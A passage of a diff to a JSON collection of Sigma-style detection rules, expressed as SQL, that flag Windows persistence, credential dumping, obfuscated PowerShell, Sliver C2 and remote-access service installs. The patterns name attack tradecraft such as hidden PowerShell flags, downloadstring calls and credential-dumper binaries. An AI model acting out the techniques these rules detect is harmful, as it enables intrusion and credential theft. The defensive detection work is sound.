multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Windows Registry Trust Record Modification", - 
"id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "author": "Antonlovesdnb", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_trust_record_modification.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ "attack.lateral_movement", - "attack.t1105" + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 
'%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Path To Screensaver Binary Modified", - "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", - "status": "test", - "description": "Detects value modification of registry key containing 
path to binary used as screensaver.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.002" + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate modification of screensaver" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 
'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_event_modify_screensaver_binary_path.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Remote Access Tool Services Have Been Installed - System", + "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "status": "experimental", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.t1547" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE 
'%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_service_install_remote_access_software.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1112" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "status": 
"test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "status": "experimental", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "status": "experimental", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", + "title": "New PDQDeploy Service - Client Side", + "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_service_install_pdqdeploy_runner.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Anydesk Remote Access Software Service Installation", + "id": "530a6faa-ff3d-4022-b315-50828e77eef5", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the installation of the anydesk software service. 
Which could be an indication of anydesk abuse if you the software isn't already used.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the anydesk tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + 
"filename": "win_system_service_install_anydesk.yml" }, { - "title": "Office Application Startup - Office Test", - "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "title": "Tap Driver Installation", + "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "status": "test", - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "author": "omkar72", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.persistence", - "attack.t1137.002" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unlikely" + "Legitimate OpenVPN TAP insntallation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "registry_event_office_test_regadd.yml" + "filename": "win_system_tap_driver_installation.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Windows Service Terminated With Error", + "id": "acfa2210-0d71-4eeb-b477-afab494d596c", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + 
"attack.defense_evasion" ], "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" + "False positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7023')" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_service_terminated_error_generic.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects well-known 
credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "status": "test", - "description": "Detects the addition of a SSP to the registry. 
Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "title": "PAExec Service Installation", + "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "status": "experimental", + "description": "Detects PAExec service installation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_service_install_paexec.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", 
- "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Removal Of SD Value to Hide Schedule Task - Registry", - "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "status": "experimental", - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", - "author": "Sittikorn S", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Removal of Potential COM Hijacking Registry Keys", - "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "status": "test", - "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": 
